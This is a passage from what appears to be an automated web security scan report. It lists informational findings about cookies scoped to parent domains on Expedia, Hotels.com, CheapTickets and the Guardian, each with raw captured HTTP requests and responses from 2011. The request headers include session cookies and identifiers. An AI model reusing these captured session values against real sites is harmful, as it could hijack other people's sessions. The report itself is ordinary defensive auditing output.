Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDUvX0uhP7z%2Fu1ZYaz9gNQxd55IafrcqsKewAgZpMaj5fZabk6MFuDRuvq58o6S2dFSXEquO8K6cAWdvyRuc9JcewxnlHHL8GOYIx9VvQ59CrwhdaIdStBZrU5q4Ul2guClyvts5IXkU8Ih0ABSFc1yfREbdE8%2B7ma2cdK4o8HDAbGpXup2Rud%2FuWVZbsTNKpP8CfTOZ7OhNndhDIMCH%2FJpeMJWPbLEdaMaSYZn4vDHoQNmtnBn6b8J%2Fb6augQoxf00frRkHVbY68KfYJ505LitOqZ3oZ7z%2FwWy8DZZ0x0aep1Yc6ZO1bfNGToKbQA4b3%2BxXEdyray%2BAxRgnHfTdirXBHrIiwYmgWtjP419X8wonEpceXpCxBzAgvZowpzjITfR8pibhKJiXP8ZIktgM27Ko%2FN0FeapHlFd7qCXe40H6spMYjXkuJghhqyYrHCfhKoxOnIURuiKYju5FyTsAf%2FcGCZQJq5Jz5ROykvLbFlG3FMtN8ezy525Y0V8ACsXyGSJX%2BtAj8qMHr8NQ18df5HpjNT18Hj%2BR%2Bh58NwJwwGSDZjCpXVyLIq62qeabC1McUJgXncEdtL96x7CT%2FvNpdhLhQs7YiMdGaBLTHQTiwULvwyjL3vRFAAGqf8FaoHB%2B87GGYPg8Zzjv%2FAPfoqMyv0OJ%2Bvo1UWD4XBr1wWtIBwidOwITrWQUTf6BVJbKeYZmUvJzYcSSdA3UcFUpr9u1XIBJZ%2F0I4DksHfQhFfmwQ00nikj%2FywtBV%2F84%2BElq4XUsM8Gh%2FcAK5W8NIqtn5QRqry6pE1NgaNCX68XLgU6zltzmw4cLFtMMbOsIx7ofy9ssO6wOlJNxZdhfbLc4O7Zj%2BMWlGTqVrC42NkTgj4512OLZ%2Fc6I67UMvxh3Qie%2FlodheV5sPFXIR5FRrKWi4wsUs48W8gfOBJvpOolIwpdDJdTSxjSuRPL01EuNp7z3Dzy3wlaJZQbE6JrU8PlbJc7tBTRWHZ4mRSdH%2FtGgL9yyifCtziMdOGXNw6kftdRVdI%2FGDbzndHQiN35W7VHyoeMFRi%2Bd0F1FkpavfYxfQdNoqwcdwsAEmwMjyALxN7GqyN1qmLPU4%2BEEBPt5ms%2F7RsoZErADPkOg986sTx5Aq%2B86Q6HID1BJLr7mUjVwW%2FTOkTW4s5494hGd%2FgPB5yo0b0OuCALpHxQxAubkIgrz6yNEReexNwFQBY6hvQFMAFVvhYSMd%2FLdChQJHNAANkDJjdsfannaTHlca6HDzStDUKlpg5Rxu4hGW%2F39QUq9dNAvdq6dQirX43mfviJRlxEdXAXSib9a34ZWTPn%2Bq%2F; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:10:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 388853
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...

13.152. http://www.cheaptickets.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...

13.153. http://www.expedia.com/Hotel-Search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 1104
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetContro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Content-Length: 589661

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...

13.154. http://www.expedia.com/TripPreferences

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /TripPreferences

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`user=v.8,0,EX010F7C6DCC$F1$88001000$D6$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$BB$B4$8E$8Ah$14l$AD!i02000`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`218; p1=`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Content-Type: text/HTML;charset=UTF-8
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/


13.155. http://www.expedia.com/daily/common/mscookie.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/common/mscookie.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/common/mscookie.aspx?PDEST=BOS HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 96
Content-Length: 96
Date: Mon, 03 Oct 2011 00:10:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaCookie=0`1034,1004,PDEST,BOS; domain=.expedia.com; expires=Tue, 31-Jan-2012 01:10:59 GMT; path=/


<!--V. 1.8 5/6/2010-->
<html>
<head>
<title></title>

</head>
<body>

</body>
</html>

13.156. http://www.expedia.com/pubspec/scripts/eap.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pubspec/scripts/eap.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pubspec/scripts/eap.asp?GOTO=HotAvail&HotID=894999&InDate=10/14/11&OutDate=10/16/11&NumAdult=2&NumChild=0&eapid=21187-1&ICMCID=TRIPA.Expedia_US-H_B4.11893.T&ICMDTL=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US.. HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: /Hotel.h894999.Hotel-Information?hashTag=roomsAndRates&&chkin=10/14/11&chkout=10/16/11&rm1=a2&icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&eapid=21187-1
Content-Length: 383
Content-Type: text/html
Cache-Control: private
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: p1=`tpid=v.1,1`11; expires=Sun, 2-Oct-2016 00:00:01 GMT; domain=.expedia.com; path=/
Set-Cookie: iEAPID=21187; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Hotel.h894999.Hotel-Information?hashTag=roomsAndRates&amp;&amp;chkin=10/14/11&amp;chkout=10/16/11
...[SNIP]...

13.157. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...

13.158. http://www.hotels.com/PPCHotelDetails

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /PPCHotelDetails

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PPCHotelDetails?hotelid=205543&arrivalDate=14/10/2011&departureDate=16/10/2011&adultsPerRoom=2&numberOfRooms=1&view=rates&PRSC=TAJ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A2.2.1%3A196.1.0%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A195.0.0%3A104.0.1%7CHCOM_US; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSLB=1; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMDMuNC4xLmk2OjE3MS4xLjA6MTMwLjEuMS5pMjo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6Mi4yLjE6MTk2LjEuMDoyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjE5NS4wLjA6MTA0LjAuMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Location: http://www.hotels.com/hotel/details.html?tab=prices&destinationId=1401516&destination=Boston%2C+Massachusetts%2C+United+States&hotelId=205543&arrivalDate=10-14-11&departureDate=10-16-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Content-Length: 0
Expect:
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=LTwAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:16 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:16 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuNi4wLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:16 GMT; Path=/


13.159. http://www.hotels.com/PPCSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /PPCSearch

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PPCSearch?city=Boston,&arrivalDate=04/10/2011&adultsPerRoom=2&numberOfRooms=1&departureDate=07/10/2011 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
